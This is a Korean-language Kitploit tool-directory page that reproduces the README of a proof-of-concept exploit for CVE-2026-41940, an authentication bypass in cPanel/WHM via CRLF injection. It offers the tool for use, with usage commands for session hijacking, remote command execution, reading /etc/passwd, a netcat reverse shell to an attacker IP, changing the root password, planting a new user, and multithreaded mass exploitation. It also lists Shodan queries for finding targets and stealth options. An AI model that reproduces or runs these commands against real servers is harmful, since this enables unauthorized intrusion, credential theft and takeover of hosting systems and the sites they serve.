Skip to content
KitploitKITPLOIT
๋„๊ตฌ์ต์Šคํ”Œ๋กœ์ž‡๋ธ”๋กœ๊ทธ
Log in
์ œ์ถœ
๋„๊ตฌ์ต์Šคํ”Œ๋กœ์ž‡๋ธ”๋กœ๊ทธ
์ œ์ถœ

ํ•ดํ‚น, ์นจํˆฌ ํ…Œ์ŠคํŠธ ๋ฐ ์‚ฌ์ด๋ฒ„ ๋ณด์•ˆ ๋„๊ตฌ๋ฅผ ๋‹น์‹ ์˜ ๋ณด์•ˆ ๋ฌด๊ธฐ๊ณ ์—!

Kitploit์€ ํ•ดํ‚น, ์‚ฌ์ด๋ฒ„ ๋ณด์•ˆ ๋ฐ ์นจํˆฌ ํ…Œ์ŠคํŠธ ๋„๊ตฌ ๋””๋ ‰ํ† ๋ฆฌ์ž…๋‹ˆ๋‹ค. ์ตœ์‹  ํ”„๋กœ์ ํŠธ ์—…๋ฐ์ดํŠธ๋ฅผ ๋ฐœ๊ฒฌํ•˜์—ฌ ์ทจ์•ฝ์ ์„ ์ฐพ๊ณ , ์‹œ์Šคํ…œ์„ ๋ถ„์„ํ•˜๊ณ , ํ…Œ์ŠคํŠธ๋ฅผ ์ž๋™ํ™”ํ•˜๊ณ , ๋ณด์•ˆ์„ ๊ฐ•ํ™”ํ•˜์„ธ์š”.

ยทยทํ”ผ๋“œยท๋ฌธ์˜ยท๊ฐœ์ธ์ •๋ณดยทยฉ 2026 Kitploit

๋„๊ตฌ ๋””๋ ‰ํ† ๋ฆฌ

์นดํ…Œ๊ณ ๋ฆฌ

๋ชจ๋“  ์นดํ…Œ๊ณ ๋ฆฌ ๋ณด๊ธฐ
Loading categories
๋„๊ตฌ/GitHubGitHub/tc4dy/cve-2026-41940-poc-exploit
Authentication & AuthorizationPrivilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPost-ExploitationPenetration Testing

์ธ๊ธฐ

๋ชจ๋‘ ๋ณด๊ธฐ โ†’

์ปค๋ฎค๋‹ˆํ‹ฐ์—์„œ ๊ฐ€์žฅ ๋งŽ์ด ์‚ฌ์šฉ๋˜๋Š” ๋„๊ตฌ๋ฅผ ์ฐพ์•„๋ณด์„ธ์š”.

๋ชจ๋“  ๋„๊ตฌ ํƒ์ƒ‰

๋„๊ตฌ ์ปฌ๋ ‰์…˜์„ ๋‘˜๋Ÿฌ๋ณด์„ธ์š”

๋ชจ๋“  ๋„๊ตฌ ๋ณด๊ธฐ โ†’
๊ณต์œ 
Command and Control
Red Teaming
Payload Development
GitHubtc4dy/cve-2026-41940-poc-exploit

CVE-2026-41940-PoC-Exploit

๐Ÿš€ CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - ์ตœ์ ์˜ ํ”Œ๋กœ์šฐ ๐Ÿ’ฅ CRLF ์ธ์ ์…˜์œผ๋กœ ์ธ์ฆ ์šฐํšŒ, ์„ธ์…˜ ํ•˜์ด์žฌํ‚น ๋ฐ ๊ณ„์ • ์œ ์ถœ์„ ์œ ๋ฐœํ•ฉ๋‹ˆ๋‹ค. โœ… ํ”„๋ก์‹œ, ์ปค์Šคํ…€ UA, keep-alive, ์žฌ์‹œ๋„, SSL ๊ฒ€์ฆ, ์ปฌ๋Ÿฌ ์ถœ๋ ฅ, ํŒŒ์ผ ์ €์žฅ ์ง€์›. โšก ์นจํˆฌ ํ…Œ์Šคํ„ฐ๋ฅผ ์œ„ํ•œ ๊ณ ๊ธ‰ PoC.

์ €์žฅ์†Œ ๋ณด๊ธฐ
92192๊ฐœ์›” ์ „์•„์ง ๊ฒ€ํ† ๋˜์ง€ ์•Š์Œ

CVE-2026-41940

๐Ÿš€ CVE-2026-41940 - cPanel/WHM ์ธ์ฆ ์šฐํšŒ ์ต์Šคํ”Œ๋กœ์ž‡

Python License CVSS Pentesting

cPanel & WHM ์—๋””์…˜ - CRLF ์ฃผ์ž…์„ ํ†ตํ•œ ์ธ์ฆ ์šฐํšŒ ๋ฐ ์™„์ „ํ•œ ์„ธ์…˜ ํ•˜์ด์žฌํ‚น

๐Ÿ“Œ ๊ฐœ์š”

์ด ์ต์Šคํ”Œ๋กœ์ž‡์€ cPanel/WHM์˜ ์น˜๋ช…์ ์ธ ์ธ์ฆ ์šฐํšŒ ์ทจ์•ฝ์ ์ธ CVE-2026-41940์„ ์•…์šฉํ•ฉ๋‹ˆ๋‹ค. ์„ธ์…˜ ๊ด€๋ฆฌ ์‹œ์Šคํ…œ์— ์ •๊ตํ•˜๊ฒŒ ์ œ์ž‘๋œ CRLF ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ฃผ์ž…ํ•˜์—ฌ ์œ ํšจํ•œ ์ž๊ฒฉ ์ฆ๋ช… ์—†์ด๋„ ์„ธ์…˜ ํ•˜์ด์žฌํ‚น, ๋ฃจํŠธ ์•ก์„ธ์Šค, ๊ทธ๋ฆฌ๊ณ  ํ˜ธ์ŠคํŒ… ํŒจ๋„์— ๋Œ€ํ•œ ์™„์ „ํ•œ ์ œ์–ด๋ฅผ ๋‹ฌ์„ฑํ•ฉ๋‹ˆ๋‹ค.

๐Ÿ”ฅ ์ฃผ์š” ๊ธฐ๋Šฅ

์นดํ…Œ๊ณ ๋ฆฌ๊ธฐ๋Šฅ
๊ณต๊ฒฉโœ… CRLF ์ฃผ์ž…์„ ํ†ตํ•œ ์ธ์ฆ ์šฐํšŒ
โœ… WHM ์„ธ์…˜ ํ•˜์ด์žฌํ‚น
โœ… ๋ณด์•ˆ ํ† ํฐ ์œ ์ถœ
โœ… ์ฆ‰์‹œ ๋ฃจํŠธ ์•ก์„ธ์Šค
์‚ฌํ›„ ๊ณต๊ฒฉโœ… ๊ณ„์ • ๋ชฉ๋ก ์ถ”์ถœ (์‚ฌ์šฉ์ž + ๋„๋ฉ”์ธ)
โœ… ์›๊ฒฉ ๋ช…๋ น ์‹คํ–‰ (RCE)
โœ… ๋ฆฌ๋ฒ„์Šค ์…ธ (netcat ํ˜ธํ™˜)
โœ… ํŒŒ์ผ ์ฝ๊ธฐ (์„ค์ • ํŒŒ์ผ, ๋กœ๊ทธ ๋“ฑ)
โœ… ๋ฃจํŠธ ๋น„๋ฐ€๋ฒˆํ˜ธ ๋ณ€๊ฒฝ
โœ… ์ƒˆ cPanel ์‚ฌ์šฉ์ž ์ƒ์„ฑ
์Šค์บ๋‹โœ… ๋‹จ์ผ ๋Œ€์ƒ ๊ณต๊ฒฉ
โœ… ๋‹ค์ค‘ ๋Œ€์ƒ ๋Œ€๋Ÿ‰ ์Šค์บ”
โœ… ๋ฉ€ํ‹ฐ์Šค๋ ˆ๋”ฉ (์Šค๋ ˆ๋“œ ์ˆ˜ ์„ค์ • ๊ฐ€๋Šฅ)
โœ… ํฌํŠธ ์˜ค๋ฒ„๋ผ์ด๋“œ ์ง€์›
์€๋‹‰โœ… ์š”์ฒญ ๊ฐ„ ๋žœ๋ค ์ง€์—ฐ
โœ… X-Forwarded-For ์Šคํ‘ธํ•‘
โœ… ์ปค์Šคํ…€ User-Agent ์ง€์›
โœ… ํ”„๋ก์‹œ ์ง€์› (HTTP/HTTPS)
์‚ฌ์šฉ์„ฑโœ… ์ธํ„ฐ๋ž™ํ‹ฐ๋ธŒ WHM ์…ธ (-i)
โœ… ์ปฌ๋Ÿฌ ์ถœ๋ ฅ (colorama)
โœ… ์ƒ์„ธ/๋””๋ฒ„๊ทธ ๋ชจ๋“œ
โœ… ๊ณ„์ • ๋ชฉ๋ก ํŒŒ์ผ ๋‚ด๋ณด๋‚ด๊ธฐ
โœ… Keep-Alive ์„ธ์…˜ ์Šค๋ ˆ๋“œ
โœ… ๋ถˆ์•ˆ์ •ํ•œ ์—ฐ๊ฒฐ์„ ์œ„ํ•œ ์žฌ์‹œ๋„ ๋ฉ”์ปค๋‹ˆ์ฆ˜

๐ŸŽฏ ์ทจ์•ฝํ•œ ๋ฒ„์ „

์ œํ’ˆ๋ฒ„์ „์ƒํƒœ
cPanel & WHM11.92 - 11.102โœ… ํ™•์ธ๋จ
cPanel & WHM11.104 - 11.110โœ… ํ™•์ธ๋จ
cPanel & WHM11.118 - 11.136โš ๏ธ ์ œํ•œ์ 
cPanel & WHM< 11.86โœ… ์ทจ์•ฝํ•  ๊ฐ€๋Šฅ์„ฑ ์žˆ์Œ

๐Ÿ“ Shodan ๊ฒ€์ƒ‰

port:2087 "cPanel" "WHM"
port:2083 "cPanel"

โš ๏ธ ๊ณ ์ง€์‚ฌํ•ญ: ์ด ๋„๊ตฌ๋Š” ์Šน์ธ๋œ ๋ณด์•ˆ ํ…Œ์ŠคํŠธ ๋ฐ ๊ต์œก ๋ชฉ์ ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ๋ฌด๋‹จ ์ ‘๊ทผ์€ ๋ถˆ๋ฒ•์ž…๋‹ˆ๋‹ค.

๐Ÿ“ฆ ์„ค์น˜

# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit

# Install dependencies
pip3 install -r requirements.txt

# Run
python3 exploit.py -t https://example.com:2087

๐Ÿ› ๏ธ ์‚ฌ์šฉ ์˜ˆ์‹œ

# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087

# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt

# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v

# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i

๐Ÿ’ป ์ธํ„ฐ๋ž™ํ‹ฐ๋ธŒ ์…ธ ๋ช…๋ น์–ด

[email protected] $ accounts          # List all cPanel accounts
[email protected] $ version           # Show cPanel version
[email protected] $ ls /home          # List directory
[email protected] $ cat /etc/passwd   # Read file
[email protected] $ exec id           # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123  # Create new user
[email protected] $ exit              # Exit shell

## ๐Ÿ”ง ์›๊ฒฉ ๋ช…๋ น ์‹คํ–‰

```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"


# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php

๐ŸŒ ๋ฆฌ๋ฒ„์Šค ์…ธ

# Attacker machine (listener)
nc -lvnp 4444

# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444

๐Ÿ” ์‚ฌํ›„ ๊ณต๊ฒฉ ์ž‘์—…

# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"

# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234

# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive  # Disable auto keep-alive

๐Ÿ“Š ๋Œ€๋Ÿ‰ ๊ณต๊ฒฉ (๋‹ค์ค‘ ๋Œ€์ƒ)

# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20

# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"

โš™๏ธ ๊ณ ๊ธ‰ ์˜ต์…˜

# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443

# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080

# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5

# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify

๐Ÿ“Š ๋ช…๋ น์ค„ ์ธ์ž

์งง์€ ์˜ต์…˜๊ธด ์˜ต์…˜์„ค๋ช…๊ธฐ๋ณธ๊ฐ’
-t--target๋‹จ์ผ ๋Œ€์ƒ URLํ•„์ˆ˜ (๋‹จ์ผ)
-l--target-file๋Œ€์ƒ ๋ชฉ๋ก์ด ํฌํ•จ๋œ ํŒŒ์ผํ•„์ˆ˜ (๋Œ€๋Ÿ‰)
-p--portํฌํŠธ ์˜ค๋ฒ„๋ผ์ด๋“œ์ž๋™ ๊ฐ์ง€
-o--output๊ณ„์ • ๋ชฉ๋ก์„ ํŒŒ์ผ๋กœ ์ €์žฅ์—†์Œ
-v--verbose๋””๋ฒ„๊ทธ ์ถœ๋ ฅ ํ™œ์„ฑํ™”False
-i--interactive์ธํ„ฐ๋ž™ํ‹ฐ๋ธŒ WHM ์…ธFalse
--proxyHTTP/HTTPS ํ”„๋ก์‹œ์—†์Œ
-ua--user-agent์ปค์Šคํ…€ User-Agent๋žœ๋ค
--cmd๋‹จ์ผ ๋ช…๋ น ์‹คํ–‰์—†์Œ
--reverse-shell๋ฆฌ๋ฒ„์Šค ์…ธ IP:PORT์—†์Œ
--passwd๋ฃจํŠธ ๋น„๋ฐ€๋ฒˆํ˜ธ ๋ณ€๊ฒฝ์—†์Œ
--adduser์ƒˆ ์‚ฌ์šฉ์ž ์ƒ์„ฑ (USER DOMAIN PASS)์—†์Œ
--read๋Œ€์ƒ์—์„œ ํŒŒ์ผ ์ฝ๊ธฐ์—†์Œ
--threads๋Œ€๋Ÿ‰ ์Šค์บ”์šฉ ์Šค๋ ˆ๋“œ ์ˆ˜10
--delayKeep-Alive ๊ฐ„๊ฒฉ (์ดˆ)3.0
--max-retries์š”์ฒญ๋‹น ์ตœ๋Œ€ ์žฌ์‹œ๋„ ํšŸ์ˆ˜3
--no-keep-alive์„ธ์…˜ ์œ ์ง€ ์•ˆ ํ•จFalse
--ssl-verifySSL ์ธ์ฆ์„œ ๊ฒ€์ฆFalse

๐Ÿงช ํ…Œ์ŠคํŠธ ํ™˜๊ฒฝ

Docker (์•ˆ์ „ํ•˜๊ฒŒ ํ…Œ์ŠคํŠธํ•˜๋ ค๋ฉด)

docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102

๋˜๋Š” ์ทจ์•ฝํ•œ ๋ฒ„์ „์œผ๋กœ

docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102

๐Ÿ”— ๊ด€๋ จ ์ต์Šคํ”Œ๋กœ์ž‡

์ œ ๋‹ค๋ฅธ ์ต์Šคํ”Œ๋กœ์ž‡ ์ €์žฅ์†Œ๋„ ํ™•์ธํ•ด ๋ณด์„ธ์š”:

  • CVE-2026-24061
  • CVE-2026-0073
  • CVE-2026-29000
๋„๊ตฌ ๋‹ค์šด๋กœ๋“œ